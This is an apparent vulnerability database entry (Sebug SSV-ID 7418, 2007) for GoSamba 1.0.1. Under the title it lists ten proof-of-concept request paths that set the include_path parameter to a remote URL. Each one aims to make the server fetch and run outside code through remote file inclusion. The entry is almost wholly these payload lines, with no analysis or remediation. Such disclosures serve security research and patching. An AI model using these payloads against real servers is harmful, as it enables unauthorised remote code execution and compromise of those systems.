GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities

SSV-ID: 7418
排行  Wiki List  捐款  漏洞扫描  云存储

SSV-AppDir: SambaVulnerabilities
Published: 2007-10-28

Exploit:

#################################################################################
#  GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities
#  http://mesh.dl.sourceforge.net/sourceforge/gosamba/gosamba.1.0.1.tar.gz
#  POC :
#  /inc_group.php?include_path=http://localhost/scripts/020.txt?
#  /inc_manager.php?include_path=http://localhost/scripts/020.txt?
#  /inc_newgroup.php.php?include_path=http://localhost/scripts/020.txt?
#  /inc_smb_conf.php?include_path=http://localhost/scripts/020.txt?
#  /inc_user.php?include_path=http://localhost/scripts/020.txt?
#  /main.php?include_path=http://localhost/scripts/020.txt?
#  /include/HTML_oben.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe1.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe3.php?include_path=http://localhost/scripts/020.txt?
#################################################################################

# sebug.net
@Sebug.net [ 2007-10-28 ]